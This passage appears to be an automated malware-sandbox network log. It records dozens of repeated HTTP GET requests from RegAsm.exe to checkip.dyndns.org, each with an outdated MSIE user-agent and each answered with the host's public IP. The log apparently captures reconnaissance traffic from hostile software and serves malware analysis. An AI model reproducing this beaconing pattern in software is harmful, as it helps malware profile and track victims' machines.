                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            48192.168.2.450101132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:39:47.996768951 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:39:48.687278032 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:39:48 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            49192.168.2.450103132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:39:49.450433969 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:39:50.132656097 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:39:50 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            50192.168.2.450105132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:39:51.325099945 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:39:51.996611118 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:39:51 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            51192.168.2.450107132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:39:52.724556923 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:39:53.418194056 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:39:53 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            52192.168.2.450109132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:39:54.259497881 CET127OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Jan 9, 2025 11:39:54.959204912 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:39:54 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            53192.168.2.450111132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:39:55.732971907 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:39:56.425000906 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:39:56 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            54192.168.2.450113132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:39:57.230429888 CET127OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Jan 9, 2025 11:39:57.912832975 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:39:57 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            55192.168.2.450115132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:39:58.658461094 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:39:59.330887079 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:39:59 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            56192.168.2.450117132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:40:00.134367943 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:40:01.315382004 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:40:01 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            57192.168.2.450119132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:40:02.049592972 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:40:08.864341021 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:40:08 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            58192.168.2.450121132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:40:10.055639029 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:40:14.600209951 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:40:14 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            59192.168.2.450123132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:40:15.520694017 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:40:16.209650993 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:40:16 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            60192.168.2.450125132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:40:16.942272902 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:40:17.632812023 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:40:17 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            61192.168.2.450127132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:40:18.405625105 CET127OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Jan 9, 2025 11:40:19.092998981 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:40:18 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            62192.168.2.450129132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:40:19.836384058 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:40:20.536482096 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:40:20 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            63192.168.2.450131132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:40:21.390301943 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:40:22.081912994 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:40:21 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            64192.168.2.450133132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:40:22.813606977 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:40:23.511044979 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:40:23 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            65192.168.2.450135132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:40:24.232633114 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:40:24.913126945 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:40:24 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            66192.168.2.450137132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:40:25.672827959 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:40:26.344916105 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:40:26 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            67192.168.2.450139132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:40:27.238368034 CET127OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Jan 9, 2025 11:40:27.934724092 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:40:27 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                            Jan 9, 2025 11:40:28.143510103 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:40:27 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
